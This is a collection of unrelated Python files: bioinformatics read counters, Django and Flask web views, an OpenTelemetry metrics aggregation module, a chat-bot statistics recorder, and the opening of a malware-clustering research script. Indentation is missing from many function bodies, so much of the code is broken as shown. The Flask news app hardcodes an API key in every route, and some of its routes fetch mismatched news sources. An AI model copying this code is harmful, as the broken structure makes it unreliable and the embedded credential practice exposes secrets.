import glob
import gzip
import os
from collections import defaultdict
__author__ = "jkkim"
def parse_fasta(fa_handler):
    '''
    Parse a FASTA file and yield (name, sequence) tuples.
    Takes an open file handle, so wrap the call in a `with` statement before using this function.
    :param fa_handler: open handle to a FASTA-formatted file
    :return: generator of (name, sequence) tuples
    '''
name, seq = None, []
for line in fa_handler:
line = line.strip()
if line.startswith(">"):
if name:
yield (name, ''.join(seq))
name = line.split()[0][1:]
seq = []
else:
seq.append(line)
if name:
yield (name, ''.join(seq))
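# Minimal usage sketch for parse_fasta (the file path below is hypothetical):
def _example_parse_fasta(fasta_path):
    """Print each sequence name and length from a FASTA file."""
    with open(fasta_path, 'rt') as handle:
        for name, seq in parse_fasta(handle):
            print(name, len(seq))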
def count_fq_gz(fname):
    """Count the number of reads in a gzipped FASTQ file (4 lines per read)."""
    i = 0
    with gzip.open(fname, 'rt') as fin:
        for i, _ in enumerate(fin, start=1):
            pass
    return i // 4
def count_file(fname):
    """Count the number of lines in a text file."""
    i = 0
    with open(fname, 'rt') as fin:
        for i, _ in enumerate(fin, start=1):
            pass
    return i
def check_dir(dir):
    """Raise ValueError if the given directory does not exist."""
    if not os.path.isdir(dir):
        raise ValueError("{} is not found!".format(dir))
def check_file(file_name):
    """Raise ValueError if the given file does not exist."""
    if not os.path.isfile(file_name):
        raise ValueError("{} is not found!".format(file_name))
def count_fasta(fname):
    """Count the number of sequences (header lines) in a FASTA file."""
    cnt = 0
    with open(fname, 'rt') as fin:
        for line in fin:
            if line.startswith(">"):
                cnt += 1
    return cnt
def count_sample_reads_fa(sample_list, fasta):
result = defaultdict(int)
sample_set = set(sample_list)
    with open(fasta, 'rt') as fin:
for gene, _ in parse_fasta(fin):
sample_id = gene.split("_")[0]
if sample_id in sample_set:
result[sample_id] += 1
return result
def count_trimmed_gz(input_dir):
result = defaultdict(int)
fq_list = [i for i in glob.glob(os.path.join(input_dir, "*_R1_*.gz")) if os.path.isfile(i)]
for i in fq_list:
sample_name = os.path.basename(i).split("_")[0]
result[sample_name] = count_fq_gz(i)
return result
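# Minimal usage sketch combining the helpers above (both paths are hypothetical):
def _example_read_counts(input_dir, fasta_path):
    """Compare per-sample trimmed read counts with the reads kept in a FASTA file."""
    trimmed = count_trimmed_gz(input_dir)
    kept = count_sample_reads_fa(list(trimmed.keys()), fasta_path)
    return {sample: (trimmed[sample], kept.get(sample, 0)) for sample in trimmed}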
|
from .execute import simple_execute
__all__ = [
'simple_execute',
]
|
from django.core.urlresolvers import reverse
from django.http import HttpResponseForbidden
from django.views.generic.edit import CreateView
from django.views.generic.list import ListView
from core.mixins import LoginRequiredMixin
from .forms import ProductForm
from .models import Product
class ProductListView(LoginRequiredMixin, ListView):
    context_object_name = 'product_list'
def get_queryset(self):
return Product.objects.filter(
stok__gt=0
)
class ProductCreateView(LoginRequiredMixin, CreateView):
model = Product
form_class = ProductForm
def get_success_url(self):
return reverse('shop:product_list')
def post(self, request, *args, **kwargs):
if request.user.is_superuser:
return super(ProductCreateView, self).post(
request, *args, **kwargs
)
return HttpResponseForbidden()
def get(self, request, *args, **kwargs):
if request.user.is_superuser:
return super(ProductCreateView, self).get(
request, *args, **kwargs
)
return HttpResponseForbidden()
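# A minimal sketch of the URL configuration these views assume (module layout and
# route strings are assumptions, not taken from the original project; on Django
# versions predating django.urls, url() from django.conf.urls would be used instead):
#
# from django.urls import path
# from .views import ProductListView, ProductCreateView
#
# app_name = 'shop'
# urlpatterns = [
#     path('', ProductListView.as_view(), name='product_list'),
#     path('add/', ProductCreateView.as_view(), name='product_create'),
# ]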
|
import unittest
from os import path
from src.utils.config import Configuration
# from src.utils.reader import ReaderLogFile
class TestConfigMethods(unittest.TestCase):
def setUp(self) -> None:
self.configurator = Configuration("./src/config.ini")
return super().setUp()
def test_printAllGroupSettings(self):
print(self.configurator.getSections())
self.assertIs(type(self.configurator.getSections()), list)
# class TestReaderMethods(unittest.TestCase):
# def setUp(self) -> None:
# self.filePath = path.abspath("./data/9 January,Saturday.htm")
# self.lastLine = 19
# self.initLine = 17
# return super().setUp()
# def test_convertLogToJSON(self):
# reader = ReaderLogFile(self.filePath)
# jsonText = reader.getJson(reader.getLines())
# self.assertIs(type(jsonText), str)
# self.assertEqual(reader.lastLine, self.lastLine,
# "Numero final de linea incorrecto")
|
from flask import Flask, render_template
from newsapi import NewsApiClient
app = Flask(__name__)
@app.route('/')
def index():
    """View function for the home page, returning Al Jazeera top headlines."""
    newsapi = NewsApiClient(api_key='c43cae8199d1435fa1e4cc0737cd4a88')
    topheadlines = newsapi.get_top_headlines(sources="al-jazeera-english")
    articles = topheadlines['articles']
    desc = []
    news = []
    img = []
    pubAt = []
    url = []
    for i in range(len(articles)):
        myarticles = articles[i]
        news.append(myarticles['title'])
        desc.append(myarticles['description'])
        img.append(myarticles['urlToImage'])
        pubAt.append(myarticles['publishedAt'])
        url.append(myarticles['url'])
    myList = zip(news, desc, img)
    return render_template('index.html', context=myList)
@app.route('/abc')
def abc():
"""
A view root page function that returns the index page and its data
"""
newsapi = NewsApiClient(api_key="c43cae8199d1435fa1e4cc0737cd4a88")
topheadlines = newsapi.get_top_headlines(sources="abc-news-au")
articles = topheadlines['articles']
des=[]
image=[]
news=[]
pubAt=[]
url= []
for i in range(len(articles)):
myarticles = articles[i]
news.append(myarticles['title'])
image.append(myarticles['urlToImage'])
des.append(myarticles['description'])
pubAt.append(myarticles['publishedAt'])
url.append(myarticles['url'])
mylist=zip(des,image,news,pubAt,url)
return render_template('abc.html', context = mylist)
@app.route('/bbc')
def bbc():
"""
A view root page function that returns the index page and its data
"""
newsapi = NewsApiClient(api_key="c43cae8199d1435fa1e4cc0737cd4a88")
topheadlines = newsapi.get_top_headlines(sources="al-jazeera-english")
articles = topheadlines['articles']
des=[]
image=[]
news=[]
pubAt=[]
url= []
for i in range(len(articles)):
myarticles = articles[i]
news.append(myarticles['title'])
image.append(myarticles['urlToImage'])
des.append(myarticles['description'])
pubAt.append(myarticles['publishedAt'])
url.append(myarticles['url'])
mylist=zip(des,image,news,pubAt,url)
return render_template('bbc.html', context = mylist)
@app.route('/cnn')
def cnn():
"""
A view root page function that returns the index page and its data
"""
newsapi = NewsApiClient(api_key="c43cae8199d1435fa1e4cc0737cd4a88")
topheadlines = newsapi.get_top_headlines(sources="abc-news-au")
articles = topheadlines['articles']
des=[]
image=[]
news=[]
pubAt=[]
url= []
for i in range(len(articles)):
myarticles = articles[i]
news.append(myarticles['title'])
image.append(myarticles['urlToImage'])
des.append(myarticles['description'])
pubAt.append(myarticles['publishedAt'])
url.append(myarticles['url'])
mylist=zip(des,image,news,pubAt,url)
return render_template('cnn.html', context = mylist)
@app.route('/aljazeera')
def aljazeera():
"""
A view root page function that returns the index page and its data
"""
newsapi = NewsApiClient(api_key="c43cae8199d1435fa1e4cc0737cd4a88")
topheadlines = newsapi.get_top_headlines(sources="al-jazeera-english")
articles = topheadlines['articles']
des=[]
image=[]
news=[]
pubAt=[]
url= []
for i in range(len(articles)):
myarticles = articles[i]
news.append(myarticles['title'])
image.append(myarticles['urlToImage'])
des.append(myarticles['description'])
pubAt.append(myarticles['publishedAt'])
url.append(myarticles['url'])
mylist=zip(des,image,news,pubAt,url)
return render_template('aljazeera.html', context = mylist)
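# The route handlers above repeat the same fetch-and-unpack logic. A hedged
# refactoring sketch (not part of the original app) that they could share; the
# helper name is hypothetical:
def _fetch_headlines(source):
    """Return (title, description, image URL, published time, URL) tuples for a NewsAPI source."""
    newsapi = NewsApiClient(api_key="c43cae8199d1435fa1e4cc0737cd4a88")
    articles = newsapi.get_top_headlines(sources=source)['articles']
    return [(a['title'], a['description'], a['urlToImage'], a['publishedAt'], a['url'])
            for a in articles]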
if __name__ == "__main__":
app.run(debug=True)
|
# Generated by Django 2.2.13 on 2020-09-21 01:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('library', '0021_auto_20200917_0103'),
]
operations = [
migrations.AlterField(
model_name='bookversion',
name='language',
field=models.TextField(default='en-US', max_length=5),
),
]
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import ABC, abstractmethod
from bisect import bisect_left
from enum import IntEnum
from logging import getLogger
from math import inf
from threading import Lock
from typing import Generic, List, Optional, Sequence, TypeVar
from opentelemetry.metrics import (
Asynchronous,
Counter,
Histogram,
Instrument,
ObservableCounter,
ObservableGauge,
ObservableUpDownCounter,
Synchronous,
UpDownCounter,
)
from opentelemetry.sdk.metrics._internal.measurement import Measurement
from opentelemetry.sdk.metrics._internal.point import Gauge
from opentelemetry.sdk.metrics._internal.point import (
Histogram as HistogramPoint,
)
from opentelemetry.sdk.metrics._internal.point import (
HistogramDataPoint,
NumberDataPoint,
Sum,
)
from opentelemetry.util.types import Attributes
_DataPointVarT = TypeVar("_DataPointVarT", NumberDataPoint, HistogramDataPoint)
_logger = getLogger(__name__)
class AggregationTemporality(IntEnum):
"""
The temporality to use when aggregating data.
Can be one of the following values:
"""
UNSPECIFIED = 0
DELTA = 1
CUMULATIVE = 2
class _Aggregation(ABC, Generic[_DataPointVarT]):
def __init__(self, attributes: Attributes):
self._lock = Lock()
self._attributes = attributes
self._previous_point = None
@abstractmethod
def aggregate(self, measurement: Measurement) -> None:
pass
@abstractmethod
def collect(
self,
aggregation_temporality: AggregationTemporality,
collection_start_nano: int,
) -> Optional[_DataPointVarT]:
pass
class _DropAggregation(_Aggregation):
def aggregate(self, measurement: Measurement) -> None:
pass
def collect(
self,
aggregation_temporality: AggregationTemporality,
collection_start_nano: int,
) -> Optional[_DataPointVarT]:
pass
class _SumAggregation(_Aggregation[Sum]):
def __init__(
self,
attributes: Attributes,
instrument_is_monotonic: bool,
instrument_temporality: AggregationTemporality,
start_time_unix_nano: int,
):
super().__init__(attributes)
self._start_time_unix_nano = start_time_unix_nano
self._instrument_temporality = instrument_temporality
self._instrument_is_monotonic = instrument_is_monotonic
if self._instrument_temporality is AggregationTemporality.DELTA:
self._value = 0
else:
self._value = None
def aggregate(self, measurement: Measurement) -> None:
with self._lock:
if self._value is None:
self._value = 0
self._value = self._value + measurement.value
def collect(
self,
aggregation_temporality: AggregationTemporality,
collection_start_nano: int,
) -> Optional[NumberDataPoint]:
"""
Atomically return a point for the current value of the metric and
reset the aggregation value.
"""
if self._instrument_temporality is AggregationTemporality.DELTA:
with self._lock:
value = self._value
start_time_unix_nano = self._start_time_unix_nano
self._value = 0
self._start_time_unix_nano = collection_start_nano
else:
with self._lock:
if self._value is None:
return None
value = self._value
self._value = None
start_time_unix_nano = self._start_time_unix_nano
current_point = NumberDataPoint(
attributes=self._attributes,
start_time_unix_nano=start_time_unix_nano,
time_unix_nano=collection_start_nano,
value=value,
)
if self._previous_point is None or (
self._instrument_temporality is aggregation_temporality
):
# Output DELTA for a synchronous instrument
# Output CUMULATIVE for an asynchronous instrument
self._previous_point = current_point
return current_point
if aggregation_temporality is AggregationTemporality.DELTA:
# Output temporality DELTA for an asynchronous instrument
value = current_point.value - self._previous_point.value
output_start_time_unix_nano = self._previous_point.time_unix_nano
else:
# Output CUMULATIVE for a synchronous instrument
value = current_point.value + self._previous_point.value
output_start_time_unix_nano = (
self._previous_point.start_time_unix_nano
)
current_point = NumberDataPoint(
attributes=self._attributes,
start_time_unix_nano=output_start_time_unix_nano,
time_unix_nano=current_point.time_unix_nano,
value=value,
)
self._previous_point = current_point
return current_point
class _LastValueAggregation(_Aggregation[Gauge]):
def __init__(self, attributes: Attributes):
super().__init__(attributes)
self._value = None
def aggregate(self, measurement: Measurement):
with self._lock:
self._value = measurement.value
def collect(
self,
aggregation_temporality: AggregationTemporality,
collection_start_nano: int,
) -> Optional[_DataPointVarT]:
"""
Atomically return a point for the current value of the metric.
"""
with self._lock:
if self._value is None:
return None
value = self._value
self._value = None
return NumberDataPoint(
attributes=self._attributes,
start_time_unix_nano=0,
time_unix_nano=collection_start_nano,
value=value,
)
class _ExplicitBucketHistogramAggregation(_Aggregation[HistogramPoint]):
def __init__(
self,
attributes: Attributes,
start_time_unix_nano: int,
boundaries: Sequence[float] = (
0.0,
5.0,
10.0,
25.0,
50.0,
75.0,
100.0,
250.0,
500.0,
1000.0,
),
record_min_max: bool = True,
):
super().__init__(attributes)
self._boundaries = tuple(boundaries)
self._bucket_counts = self._get_empty_bucket_counts()
self._min = inf
self._max = -inf
self._sum = 0
self._record_min_max = record_min_max
self._start_time_unix_nano = start_time_unix_nano
# It is assumed that the "natural" aggregation temporality for a
# Histogram instrument is DELTA, like the "natural" aggregation
# temporality for a Counter is DELTA and the "natural" aggregation
# temporality for an ObservableCounter is CUMULATIVE.
self._instrument_temporality = AggregationTemporality.DELTA
def _get_empty_bucket_counts(self) -> List[int]:
return [0] * (len(self._boundaries) + 1)
def aggregate(self, measurement: Measurement) -> None:
value = measurement.value
if self._record_min_max:
self._min = min(self._min, value)
self._max = max(self._max, value)
self._sum += value
self._bucket_counts[bisect_left(self._boundaries, value)] += 1
def collect(
self,
aggregation_temporality: AggregationTemporality,
collection_start_nano: int,
) -> Optional[_DataPointVarT]:
"""
Atomically return a point for the current value of the metric.
"""
with self._lock:
if not any(self._bucket_counts):
return None
bucket_counts = self._bucket_counts
start_time_unix_nano = self._start_time_unix_nano
sum_ = self._sum
max_ = self._max
min_ = self._min
self._bucket_counts = self._get_empty_bucket_counts()
self._start_time_unix_nano = collection_start_nano
self._sum = 0
self._min = inf
self._max = -inf
current_point = HistogramDataPoint(
attributes=self._attributes,
start_time_unix_nano=start_time_unix_nano,
time_unix_nano=collection_start_nano,
count=sum(bucket_counts),
sum=sum_,
bucket_counts=tuple(bucket_counts),
explicit_bounds=self._boundaries,
min=min_,
max=max_,
)
if self._previous_point is None or (
self._instrument_temporality is aggregation_temporality
):
self._previous_point = current_point
return current_point
max_ = current_point.max
min_ = current_point.min
if aggregation_temporality is AggregationTemporality.CUMULATIVE:
start_time_unix_nano = self._previous_point.start_time_unix_nano
sum_ = current_point.sum + self._previous_point.sum
# Only update min/max on delta -> cumulative
max_ = max(current_point.max, self._previous_point.max)
min_ = min(current_point.min, self._previous_point.min)
bucket_counts = [
curr_count + prev_count
for curr_count, prev_count in zip(
current_point.bucket_counts,
self._previous_point.bucket_counts,
)
]
else:
start_time_unix_nano = self._previous_point.time_unix_nano
sum_ = current_point.sum - self._previous_point.sum
bucket_counts = [
curr_count - prev_count
for curr_count, prev_count in zip(
current_point.bucket_counts,
self._previous_point.bucket_counts,
)
]
current_point = HistogramDataPoint(
attributes=self._attributes,
start_time_unix_nano=start_time_unix_nano,
time_unix_nano=current_point.time_unix_nano,
count=sum(bucket_counts),
sum=sum_,
bucket_counts=tuple(bucket_counts),
explicit_bounds=current_point.explicit_bounds,
min=min_,
max=max_,
)
self._previous_point = current_point
return current_point
class Aggregation(ABC):
"""
Base class for all aggregation types.
"""
@abstractmethod
def _create_aggregation(
self,
instrument: Instrument,
attributes: Attributes,
start_time_unix_nano: int,
) -> _Aggregation:
"""Creates an aggregation"""
class DefaultAggregation(Aggregation):
"""
The default aggregation to be used in a `View`.
This aggregation will create an actual aggregation depending on the
instrument type, as specified next:
==================================================== ====================================
Instrument Aggregation
==================================================== ====================================
`opentelemetry.sdk.metrics.Counter` `SumAggregation`
`opentelemetry.sdk.metrics.UpDownCounter` `SumAggregation`
`opentelemetry.sdk.metrics.ObservableCounter` `SumAggregation`
`opentelemetry.sdk.metrics.ObservableUpDownCounter` `SumAggregation`
`opentelemetry.sdk.metrics.Histogram` `ExplicitBucketHistogramAggregation`
`opentelemetry.sdk.metrics.ObservableGauge` `LastValueAggregation`
==================================================== ====================================
"""
def _create_aggregation(
self,
instrument: Instrument,
attributes: Attributes,
start_time_unix_nano: int,
) -> _Aggregation:
# pylint: disable=too-many-return-statements
if isinstance(instrument, Counter):
return _SumAggregation(
attributes,
instrument_is_monotonic=True,
instrument_temporality=AggregationTemporality.DELTA,
start_time_unix_nano=start_time_unix_nano,
)
if isinstance(instrument, UpDownCounter):
return _SumAggregation(
attributes,
instrument_is_monotonic=False,
instrument_temporality=AggregationTemporality.DELTA,
start_time_unix_nano=start_time_unix_nano,
)
if isinstance(instrument, ObservableCounter):
return _SumAggregation(
attributes,
instrument_is_monotonic=True,
instrument_temporality=AggregationTemporality.CUMULATIVE,
start_time_unix_nano=start_time_unix_nano,
)
if isinstance(instrument, ObservableUpDownCounter):
return _SumAggregation(
attributes,
instrument_is_monotonic=False,
instrument_temporality=AggregationTemporality.CUMULATIVE,
start_time_unix_nano=start_time_unix_nano,
)
if isinstance(instrument, Histogram):
return _ExplicitBucketHistogramAggregation(
attributes, start_time_unix_nano
)
if isinstance(instrument, ObservableGauge):
return _LastValueAggregation(attributes)
raise Exception(f"Invalid instrument type {type(instrument)} found")
class ExplicitBucketHistogramAggregation(Aggregation):
"""This aggregation informs the SDK to collect:
- Count of Measurement values falling within explicit bucket boundaries.
- Arithmetic sum of Measurement values in population. This SHOULD NOT be collected when used with instruments that record negative measurements, e.g. UpDownCounter or ObservableGauge.
- Min (optional) Measurement value in population.
- Max (optional) Measurement value in population.
Args:
boundaries: Array of increasing values representing explicit bucket boundary values.
record_min_max: Whether to record min and max.
"""
def __init__(
self,
boundaries: Sequence[float] = (
0.0,
5.0,
10.0,
25.0,
50.0,
75.0,
100.0,
250.0,
500.0,
1000.0,
),
record_min_max: bool = True,
) -> None:
self._boundaries = boundaries
self._record_min_max = record_min_max
def _create_aggregation(
self,
instrument: Instrument,
attributes: Attributes,
start_time_unix_nano: int,
) -> _Aggregation:
return _ExplicitBucketHistogramAggregation(
attributes,
start_time_unix_nano,
self._boundaries,
self._record_min_max,
)
class SumAggregation(Aggregation):
"""This aggregation informs the SDK to collect:
- The arithmetic sum of Measurement values.
"""
def _create_aggregation(
self,
instrument: Instrument,
attributes: Attributes,
start_time_unix_nano: int,
) -> _Aggregation:
temporality = AggregationTemporality.UNSPECIFIED
if isinstance(instrument, Synchronous):
temporality = AggregationTemporality.DELTA
elif isinstance(instrument, Asynchronous):
temporality = AggregationTemporality.CUMULATIVE
return _SumAggregation(
attributes,
isinstance(instrument, (Counter, ObservableCounter)),
temporality,
start_time_unix_nano,
)
class LastValueAggregation(Aggregation):
"""
This aggregation informs the SDK to collect:
- The last Measurement.
- The timestamp of the last Measurement.
"""
def _create_aggregation(
self,
instrument: Instrument,
attributes: Attributes,
start_time_unix_nano: int,
) -> _Aggregation:
return _LastValueAggregation(attributes)
class DropAggregation(Aggregation):
"""Using this aggregation will make all measurements be ignored."""
def _create_aggregation(
self,
instrument: Instrument,
attributes: Attributes,
start_time_unix_nano: int,
) -> _Aggregation:
return _DropAggregation(attributes)
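# A minimal usage sketch, assuming the public opentelemetry.sdk.metrics API (the
# instrument name and bucket boundaries below are illustrative only):
#
# from opentelemetry.sdk.metrics import MeterProvider
# from opentelemetry.sdk.metrics.view import View
#
# view = View(
#     instrument_name="request.latency",
#     aggregation=ExplicitBucketHistogramAggregation(boundaries=(0.0, 10.0, 100.0)),
# )
# provider = MeterProvider(views=[view])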
|
""" 数据记录插件
记录排行版插件,历史插件,状态插件所需的数据
如果遇到老版本数据,则自动升级
"""
from datetime import datetime, timedelta
from coolqbot import PluginData, bot
VERSION = '1'
DATA = PluginData('recorder')
def get_history_pkl_name(dt: datetime):
time_str = dt.strftime('%Y-%m')
return time_str
def update(data: dict, group_id: int):
    """ Upgrade script
    Upgrades recorder data from version 0.8.1 and earlier.
    """
    # Determine which kind of data this is
if isinstance(list(data.values())[0], int):
return update_old_1(data, group_id)
else:
return update_old_2(data, group_id)
def update_old_1(data: dict, group_id: int):
    """ Upgrade data from versions before 0.7.0
    """
    new_data = {}
    # Add version information
    new_data['version'] = VERSION
    # Upgrade last_message_on
    new_data['last_message_on'] = {}
    new_data['last_message_on'][group_id] = data['last_message_on']
    # Upgrade msg_send_time
    new_data['msg_send_time'] = {}
    new_data['msg_send_time'][group_id] = []
    # Upgrade repeat_list
    new_data['repeat_list'] = {}
    new_data['repeat_list'][group_id] = data['repeat_list']
    # Upgrade msg_number_list
    new_data['msg_number_list'] = {}
    new_data['msg_number_list'][group_id] = data['msg_number_list']
    return new_data
def update_old_2(data: dict, group_id: int):
    """ Upgrade recorder data from versions 0.7.0 through 0.8.1
    """
    new_data = {}
    # Add version information
    new_data['version'] = VERSION
    # Upgrade last_message_on
    new_data['last_message_on'] = {}
    new_data['last_message_on'][group_id] = data['last_message_on']
    # Upgrade msg_send_time
    new_data['msg_send_time'] = {}
    new_data['msg_send_time'][group_id] = []
    # Upgrade repeat_list
    new_data['repeat_list'] = {}
    new_data['repeat_list'][group_id] = data['repeat_list']
    # Upgrade msg_number_list
    new_data['msg_number_list'] = {}
    new_data['msg_number_list'][group_id] = data['msg_number_list']
    return new_data
class Recorder:
    def __init__(self, name: str, data: PluginData):
        self._name = name
        self._data = data
        # Initialize runtime data
        self.init_data()
        # Bot status
        # Start time
        self.start_time = datetime.now()
        # CoolQ status
        self.coolq_status = False
        # Whether a greeting needs to be sent
        self.send_hello = False
        self._load_data()
    def message_number(self, x: int, group_id: int):
        """ Return the number of messages sent in the given group within the last x minutes,
        and drop the older message records.
        """
        times = self._msg_send_time[group_id]
        now = datetime.now()
        for i in range(len(times)):
            if times[i] > now - timedelta(minutes=x):
                self._msg_send_time[group_id] = times[i:]
                return len(times) - i
        # No message within the window, so clear the records
        self._msg_send_time[group_id] = []
        return 0
    def repeat_list(self, group_id: int):
        """ Get the whole month's repeat records for the given group
        """
        return self._merge_list(self._repeat_list[group_id])
    def msg_number_list(self, group_id: int):
        """ Get the whole month's message-count records for the given group
        """
        return self._merge_list(self._msg_number_list[group_id])
    def repeat_list_by_day(self, day, group_id: int):
        """ Get the repeat records of the given group for a single day
        """
        if day in self._repeat_list[group_id]:
            return self._repeat_list[group_id][day]
        return {}
    def msg_number_list_by_day(self, day, group_id: int):
        """ Get the message-count records of the given group for a single day
        """
        if day in self._msg_number_list[group_id]:
            return self._msg_number_list[group_id][day]
        return {}
    def add_repeat_list(self, qq, group_id: int):
        """ Increment the repeat count of this QQ number in the given group
        """
        self._add_to_list(self._repeat_list, qq, group_id)
    def add_msg_number_list(self, qq, group_id: int):
        """ Increment the message count of this QQ number in the given group
        """
        self._add_to_list(self._msg_number_list, qq, group_id)
    def add_msg_send_time(self, time, group_id: int):
        """ Append this time to the given group's list of message send times
        """
        self._msg_send_time[group_id].append(time)
def last_message_on(self, group_id: int):
return self._last_message_on[group_id]
def reset_last_message_on(self, group_id: int):
self._last_message_on[group_id] = datetime.now()
    def _add_to_list(self, record_list, qq, group_id: int):
        """ Add an entry to the record list
        """
        day = datetime.now().day
        if day not in record_list[group_id]:
            record_list[group_id][day] = {}
        try:
            record_list[group_id][day][qq] += 1
        except KeyError:
            record_list[group_id][day][qq] = 1
    def _merge_list(self, record_list):
        """ Merge the per-day data stored in the dictionary
        """
        new_list = {}
        for day_list in record_list:
            for qq in record_list[day_list]:
                if qq in new_list:
                    new_list[qq] += record_list[day_list][qq]
                else:
                    new_list[qq] = record_list[day_list][qq]
        return new_list
    def _load_data(self):
        """ Load the data
        """
        if not self._data.exists(f'{self._name}.pkl'):
            bot.logger.error(f'{self._name}.pkl does not exist!')
            return
        data = self._data.load_pkl(self._name)
        # If the data is in an old format, upgrade it before loading
        # By default the first group in the configuration is used to upgrade old data
        if 'version' not in data or data['version'] != VERSION:
            bot.logger.info('Old-format data found, upgrading')
            data = update(data, bot.get_bot().config.GROUP_ID[0])
            self._data.save_pkl(data, self._name)
            bot.logger.info('Data upgraded successfully')
        # Load the data
        self._last_message_on = data['last_message_on']
        self._msg_send_time = data['msg_send_time']
        self._repeat_list = data['repeat_list']
        self._msg_number_list = data['msg_number_list']
        # If new groups were added to the group list, fill in the data they need
        for group_id in bot.get_bot().config.GROUP_ID:
            if group_id not in self._last_message_on:
                self._last_message_on[group_id] = datetime.now()
            if group_id not in self._msg_send_time:
                self._msg_send_time[group_id] = []
            if group_id not in self._repeat_list:
                self._repeat_list[group_id] = {}
            if group_id not in self._msg_number_list:
                self._msg_number_list[group_id] = {}
    def save_data(self):
        """ Save the data
        """
        self._data.save_pkl(self.get_data(), self._name)
    def get_data(self):
        """ Get the current data,
        including its version number
        """
        return {
            'version': VERSION,
            'last_message_on': self._last_message_on,
            'msg_send_time': self._msg_send_time,
            'repeat_list': self._repeat_list,
            'msg_number_list': self._msg_number_list
        }
    def init_data(self):
        """ Initialize the data
        """
self._last_message_on = {
group_id: datetime.now()
for group_id in bot.get_bot().config.GROUP_ID
}
self._msg_send_time = {
group_id: []
for group_id in bot.get_bot().config.GROUP_ID
}
self._repeat_list = {
group_id: {}
for group_id in bot.get_bot().config.GROUP_ID
}
self._msg_number_list = {
group_id: {}
for group_id in bot.get_bot().config.GROUP_ID
}
recorder = Recorder('recorder', DATA)
@bot.scheduler.scheduled_job('interval', minutes=1, id='save_recorder')
async def save_recorder():
""" 每隔一分钟保存一次数据
"""
# 保存数据前先清理 msg_send_time 列表,仅保留最近 10 分钟的数据
for group_id in bot.get_bot().config.GROUP_ID:
recorder.message_number(10, group_id)
recorder.save_data()
|
"""
MutantX-S Implementation for EMBER Function Imports
This work is our rendition of MutantX-S, a static malware classification system.
@Authors: Noah MacAskill and Zachary Wilkins
"""
import random
from json import loads, dump
from sys import argv
from collections import OrderedDict, Counter
import logging as lg
import csv
from datetime import datetime
import numpy as np
from numpy import vstack
from scipy.sparse import csr_matrix
from sklearn.feature_extraction import FeatureHasher
from sklearn.metrics import pairwise_distances, f1_score, homogeneity_completeness_v_measure, \
precision_recall_fscore_support
from sklearn.preprocessing import normalize
from tqdm import tqdm
def main():
file_names = md5_file = n = p_max = d_min = None
# Store parameters if given via command line
if len(argv) > 1:
n = int(argv[1])
p_max = float(argv[2])
d_min = float(argv[3])
md5_file = argv[4]
file_names = argv[5:]
# Receive n from user if not given
if n is None:
n = int(input("Select size of N-grams: "))
# Retrieve p_max from user if not given
if p_max is None:
p_max = float(input("Select p_max: "))
# Retrieve d_min from user if not given
if d_min is None:
d_min = float(input("Select d_min: "))
# Import required information from EMBER
info_list, record_list, md5_to_avclass = open_ember_files(md5_file, file_names)
lg.info('Loaded records from {} samples, converting to N-Grams...'.format(len(info_list)))
# Convert function import info into N-grams
md5_to_ngrams = convert_function_imports_to_ngrams(info_list, record_list, n)
lg.info('Converting to feature vectors...')
# Convert N-grams into feature vectors
md5_to_fvs, int_to_ngram = create_feature_vectors_from_ngrams(md5_to_ngrams)
lg.info('Hashing feature vectors...')
# Reduce the dimensions of the feature vectors using the feature hashing trick
feature_matrix = reduce_dimensions_hashing_trick(md5_to_fvs)
lg.info('Selecting prototypes...')
# Select a group of prototypes from the samples
prototypes, prototypes_to_data_points = select_prototypes(feature_matrix, p_max)
lg.info('Clustering {} prototypes...'.format(len(prototypes)))
# Cluster the prototypes
clustered_prototypes = cluster_prototypes(feature_matrix, prototypes, d_min)
lg.info('Converting indices back to MD5s...')
# Creates the final clusters of md5s
md5_clusters, md5_prototype_clusters = indices_to_md5s(clustered_prototypes, prototypes_to_data_points,
list(md5_to_fvs.keys()))
lg.info('Scoring clustering...')
# Score the clustering
results, labels_accuracy = score_clustering(md5_clusters, md5_prototype_clusters, md5_to_avclass)
lg.info('Creating signatures for each cluster...')
# Create signatures for each cluster
signatures = cluster_signatures(int_to_ngram, md5_clusters, md5_to_fvs)
lg.info('Log results...')
# Log the final results
log_results(results, n, p_max, d_min, md5_clusters, md5_prototype_clusters, md5_to_avclass, signatures,
labels_accuracy)
lg.info('Done!')
def open_ember_files(md5_file_name, file_names: list = None) -> tuple:
"""
Import required information from EMBER data
Parameters
----------
md5_file_name:
The name of the file containing the samples (MD5s) to be clustered
file_names : list
A list of files to search through for the malware samples to be clustered
    Returns
    -------
    (list, list, dict)
        list of (md5, number of function imports) tuples for each sample
        list of (md5, library, function) tuples with information on each function import
        mapping from md5 to its AVClass label
    """
if md5_file_name is None:
md5_file_name = input("Select MD5 file: ")
# Open list of md5s representing the samples to be clustered
md5_file = open(md5_file_name, 'r')
md5s = list()
# Read in each md5
for line in md5_file:
md5s.append(line[:-1])
md5_file.close()
info_list = list()
record_list = list()
md5_to_avclass = dict()
# Retrieve file names from user if not given
if file_names is None:
file_names = input("Select file names separated by spaces: ")
file_names = file_names.split()
# Import required information from each file
for file_name in tqdm(file_names, desc='LoadFiles'):
lg.info('Loading records from file: {}'.format(file_name))
with open(file_name, 'r') as f:
# Import required information from each malware sample (line of file)
for line in f:
json_doc = loads(line)
md5 = json_doc['md5']
# If one of the md5s we're searching for is found, store its information
if md5 in md5s:
imports = json_doc['imports']
avclass = json_doc['avclass']
one_sample_records = list()
count = 0
for library in imports:
for function in filter(None, imports[library]):
count += 1
one_sample_records.append((md5, library, function))
if count >= 4:
info_list.append((md5, str(count)))
record_list.extend(one_sample_records.copy())
one_sample_records.clear()
md5_to_avclass[md5] = avclass
return info_list, record_list, md5_to_avclass
def convert_function_imports_to_ngrams(info_list: list, record_list: list, n: int) -> dict:
"""Converts functions imported by malware samples to N-grams
representing potential behaviours of those samples.
Parameters
----------
info_list : list
A list containing exactly one tuple per malware sample,
where tuples are of the form (MD5, number of imports)
record_list : list
A list containing a variable number of tuples per malware
sample, where tuples are of the form: (MD5, library, function)
n : int
The window size for the N-grams
Returns
-------
dict
a mapping of str to list: MD5 to list of N-grams
"""
import_index = 0
md5_to_ngrams = OrderedDict()
